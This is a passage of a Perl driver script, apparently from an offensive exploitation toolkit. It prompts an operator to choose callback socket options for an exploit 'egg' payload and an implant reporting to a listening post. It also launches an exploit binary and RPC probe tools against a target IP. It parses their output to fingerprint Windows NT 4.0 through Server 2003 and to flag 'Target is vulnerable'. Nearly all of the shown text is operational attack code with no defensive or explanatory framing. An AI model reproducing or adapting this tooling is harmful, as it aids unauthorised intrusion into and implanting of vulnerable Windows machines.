781. elsif( ($continue eq "q") or ($continue eq "quit") or ($continue eq "Q") or ($continue eq "QUIT") ) {
782. &EU_ExitMessage(1,"User terminated script\n");
783. }
784. else {
785. &EU_Log(1, "Returning to top of script...\n");
786. next;
787. }
788.  
789. }
790.  
791.  
792. if( $WindowsVersion eq $nt4 ) { $WindowsVersion = 2; }
793. elsif( $WindowsVersion eq $w2k ) { $WindowsVersion = 3; }
794. elsif( $WindowsVersion eq $wxp ) { $WindowsVersion = 4; }
795. elsif( $WindowsVersion eq $ws2003 ) { $WindowsVersion = 5; }
796. else {$WindowsVersion = 0;}
797.  
798. return ($TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName, $TimeOutValue,
799. $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
800. $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
801. $WindowsVersion, $TargetServerIp);
802. }
803.  
804.  
805.  
806.  
807.  
808.  
809.  
810. sub get_socket_options()
811. {
812. my ($ImplantSocketStatus, $EggSocketStatus, $PayloadType) = @_;
813.  
814. my $opt;
815. my $EggSocketOption0 = "Re-use existing socket connection";
816. my $EggSocketOption1 = "Create a new socket connection";
817. my $ImplantSocketOption = "Maintain this socket for the Implant connection with the LP";
818.  
819.  
820. &EU_Log(1,"\nThe ELV Exploit Payload Must Call-back in Order to Upload the Implant Payload.");
821. &EU_Log(1,"Select the Socket Option To Use:\n");
822. &EU_Log(1," 0) $EggSocketOption0");
823. &EU_Log(1," 1) $EggSocketOption1");
824. while(1) {
825. $opt = &EU_GetInput("\nEnter selection [0]: ", "0");
826. &EU_Log(0, "\nEnter selection [0]: $opt");
827.  
828. if ($opt eq "0") {
829. $EggSocketStatus = $::EGG_SOCKET_REUSE;
830. }
831. elsif($opt eq "1") {
832. $EggSocketStatus = $::EGG_SOCKET_NEW;
833. }
834. else {
835. &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
836. next;
837. }
838. last;
839. }
840.  
841.  
842.  
843. $ImplantSocketStatus = $::IMPLANT_SOCKET_NEW;
844.  
845. if($PayloadType eq "d") {
846. if($EggSocketStatus eq $::EGG_SOCKET_NEW) {
847. $opt = &EU_GetInput("\n$ImplantSocketOption ([y],n)? ", "y");
848. &EU_Log(0, "\n$ImplantSocketOption ([y],n)? $opt");
849. if( $opt eq "y" or $opt eq "Y" or $opt eq "yes" or $opt eq "YES" ) {
850. $ImplantSocketStatus = $::IMPLANT_SOCKET_MAINTAIN;
851. }
852. }
853. else {
854. &EU_Log(1,"\nWhen re-using existing socket connection, operator must reconnect to the ");
855. &EU_Log(1,"implant for the operation. Original socket will be closed after the target");
856. &EU_Log(1,"has been exploited and the implant deployed.");
857. }
858. }
859.  
860. return ($ImplantSocketStatus, $EggSocketStatus);
861. }
862.  
863.  
864.  
865. sub run_elvtouch()
866. {
867. my ($root_dir, $TargetIp, $TargetPort, $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection, $TargetServerIp, $TimeOutValue, $touchType) = @_;
868. my $handle = new FileHandle;
869.  
870. my $bVulnerable = 0;
871. my $bError = 0;
872. my $WindowsVersion = $not;
873.  
874. if( $touchType ne $::RUN_PROBE_1 ) {
875. $bError = 1;
876. &EU_Log(1, "ERROR: Touch Type \"$touchType\" not supported\n");
877. return ($WindowsVersion,$bVulnerable,$bError);
878. }
879.  
880. my $cmdline = "\"$root_dir\\$::EXPLOIT_EXE\" -r $touchType -i $TargetIp -p $TargetPort -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -h $TargetServerIp -o $TimeOutValue";
881. &EU_Log(0, "$cmdline");
882.  
883. &EU_Log(0, "Touching target...");
884. if(!open($handle, "$cmdline|")) {
885. &EU_ExitMessage(1, "Unable to execute $::EXPLOIT_EXE");
886. }
887.  
888. my $line;
889.  
890. if( $touchType eq $::RUN_PROBE_1 ) {
891.  
892. while(<$handle>) {
893. chomp($line = $_);
894. &EU_Log(1, $line);
895.  
896. if($line =~ /Looks like Windows NT 4.0/) {
897. $WindowsVersion = $nt4;
898. }
899. elsif($line =~ /Looks like Windows 2000/) {
900. $WindowsVersion = $w2k;
901. }
902. elsif($line =~ /Looks like Windows XP SP2/) {
903. $WindowsVersion = $wxpsp2;
904. }
905. elsif($line =~ /Looks like Windows XP \(SP1 and below\)/) {
906. $WindowsVersion = $wxp;
907. }
908. elsif($line =~ /Looks like Windows Server 2003 SP1/) {
909. $WindowsVersion = $ws2003sp1;
910. }
911. elsif($line =~ /Looks like Windows Server 2003 \(Base release\)/) {
912. $WindowsVersion = $ws2003;
913. }
914. elsif($line =~ /Looks like UNKNOWN Windows version/) {
915. $WindowsVersion = $not;
916. }
917. elsif($line =~ /Target is vulnerable/) {
918. $bVulnerable = 1;
919. }
920. elsif($line =~ /Target is NOT vulnerable/) {
921. $bVulnerable = 0;
922. }
923. elsif($line =~ /ERROR/) {
924. $bError = 1;
925. }
926. }
927. }
928.  
929. &EU_Log(0, "run_elvtouch:\n\tWindowsVersion: $WindowsVersion\n\tbVulnerable: $bVulnerable\n\tbError: $bError\n");
930.  
931. return ($WindowsVersion,$bVulnerable,$bError);
932. }
933.  
934.  
935.  
936. sub launch_rpctouchii() {
937. my ($root_dir, $TargetIp, $TargetPort, $RunOption, $TargetTransportProtocol, $TargetApplicationProtocol, $TargetServerIp, $TimeOutValue) = @_;
938. my $handle = new FileHandle;
939.  
940. my $AtsvcPort = "Unknown";
941. my $ProbeError = 0;
942. my $MachineType = $not;
943.  
944.  
945. my $cmdline = "\"$root_dir\\$::RPCTOUCHII\" -i $TargetIp -p $TargetPort -r $RunOption -t $TargetTransportProtocol -b $TargetApplicationProtocol -h $TargetServerIp -o $TimeOutValue";
946. &EU_Log(0, "$cmdline");
947.  
948. &EU_Log(0, "Probing target...");
949. if(!open($handle, "$cmdline|")) {
950. &EU_ExitMessage(1, "Unable to execute $::REGPROBE");
951. }
952.  
953. my $junk;
954. my $line;
955. my $success = 0;
956.  
957. if( $RunOption eq $RPCTOUCHII_RUN_GENERAL_PROBE ) {
958.  
959. while(<$handle>) {
960. chomp($line = $_);
961. &EU_Log(1, $line);
962.  
963. if($line =~ /ERROR/) {
964. $ProbeError = 1;
965. $MachineType = $not;
966. }
967. elsif($line =~ /Looks like UNKNOWN Windows version/) {
968. $MachineType = $not;
969. }
970. elsif($line =~ /Looks like Windows 9x/) {
971. $MachineType = $w9x;
972. }
973. elsif($line =~ /Looks like Windows NT 4.0/) {
974. $MachineType = $nt4;
975. }
976. elsif($line =~ /Looks like Windows 2000/) {
977. $MachineType = $w2k;
978. }
979. elsif($line =~ /Looks like Windows XP/) {
980. $MachineType = $wxp;
981. }
982. elsif($line =~ /Looks like Windows Server 2003/) {
983. $MachineType = $ws2003;
984. }
985. elsif($line =~ /Looks like Windows 2003/) {
986. $MachineType = $ws2003;
987. }
988. elsif($line =~ /Looks like either Windows XP or Windows Server 2003/) {
989. $MachineType = $wxp2003;
990. }
991. }
992. }
993. elsif( $RunOption eq $RPCTOUCHII_RUN_REGPROBE ) {
994.  
995. while(<$handle>) {
996. chomp($line = $_);
997. &EU_Log(1, $line);
998.  
999. if($line =~ /ERROR/) {
1000. $ProbeError = 1;
1001. $MachineType = $not;
1002. }
1003. elsif($line =~ /Looks like UNKNOWN Windows version/) {
1004. $MachineType = $not;
1005. }
1006. elsif($line =~ /Looks like either Windows 9x or NT 4.0/) {
1007. $ProbeError = 1;
1008. $MachineType = $w9x;
1009. }
1010. elsif($line =~ /Looks like Windows NT 4.0/) {
1011. $MachineType = $nt4;
1012. }
1013. elsif($line =~ /Looks like either Windows 2000 or Windows XP/) {
1014. $MachineType = $w2kXp;
1015. }
1016. elsif($line =~ /Looks like Windows Server 2003/) {
1017. $MachineType = $ws2003;
1018. }
1019. elsif($line =~ /Looks like Windows 2003/) {
1020. $MachineType = $ws2003;
1021. }
1022. }
1023. }
1024. elsif( $RunOption eq $RPCTOUCHII_RUN_WINDOWS_2003_PROBE ) {
1025.  
1026. while(<$handle>) {
1027. chomp($line = $_);
1028. &EU_Log(1, $line);
1029.  
1030. if($line =~ /ERROR/) {
1031. $ProbeError = 1;
1032. $MachineType = $not;
1033. }
1034. elsif($line =~ /Looks like UNKNOWN Windows version/) {
1035. $MachineType = $not;
1036. }
1037. elsif($line =~ /Looks like Beta Windows Server 2003/) {
1038. $MachineType = $not;
1039. }
1040. elsif($line =~ /Looks like Windows XP Professional or Home Edition/) {
1041. $MachineType = $wxp;
1042. }
1043. elsif($line =~ /Looks like Windows XP/) {
1044. $MachineType = $wxp;
1045. }
1046. elsif($line =~ /Looks like Windows Server 2003/) {
1047. $MachineType = $ws2003;
1048. }
1049. elsif($line =~ /Looks like Windows 2003/) {
1050. $MachineType = $ws2003;
1051. }
1052. }
1053. }
1054. elsif( $RunOption eq $RPCTOUCHII_RUN_XP_SP0_PROBE ) {
1055.  
1056. while(<$handle>) {
1057. chomp($line = $_);
1058. &EU_Log(1, $line);
1059.  
1060. if($line =~ /ERROR/) {
1061. $ProbeError = 1;
1062. $MachineType = $not;
1063. }
1064. elsif($line =~ /Service Pack 0/) {
1065. $MachineType = $wxpsp0;
1066. }
1067. elsif($line =~ /Service Pack 1/) {
1068. $MachineType = $wxpsp1;
1069. }
1070. }
1071. }
1072. elsif( $RunOption eq $RPCTOUCHII_RUN_RPC_INTERFACE_PORT ) {
1073. while(<$handle>) {
1074. chomp($line = $_);
1075. &EU_Log(1, $line);
1076.  
1077. if($line =~ /^Port number for Atsvc/) {
1078.  
1079. ($junk,$AtsvcPort)= split(/:/,$line);
1080.  
1081. }
1082. }
1083. }
1084. elsif( $RunOption eq $RPCTOUCHII_RUN_WINDOWS_2000_SP4_PROBE ) {
1085. while(<$handle>) {
1086. chomp($line = $_);
1087. &EU_Log(1, $line);
1088.  
1089. if($line =~ /ERROR/) {
1090. $ProbeError = 1;
1091. $MachineType = $not;
1092. }
1093. elsif($line =~ /Windows 2000 Service Pack 0, 1, 2, or 3/) {
1094. $MachineType = $w2ksp0123;
1095. }
1096. elsif($line =~ /Windows 2000 Service Pack 4/) {
1097. $MachineType = $w2ksp4;
1098. }
1099. }
1100. }
1101. if( $RunOption eq $RPCTOUCHII_RUN_RPC_INTERFACE_PORT ) {
1102. return($AtsvcPort,$ProbeError);
1103. }
1104. else {
1105. return ($MachineType,$ProbeError);
1106. }
1107. }
1108.  
1109.  
1110.  
1111. __END__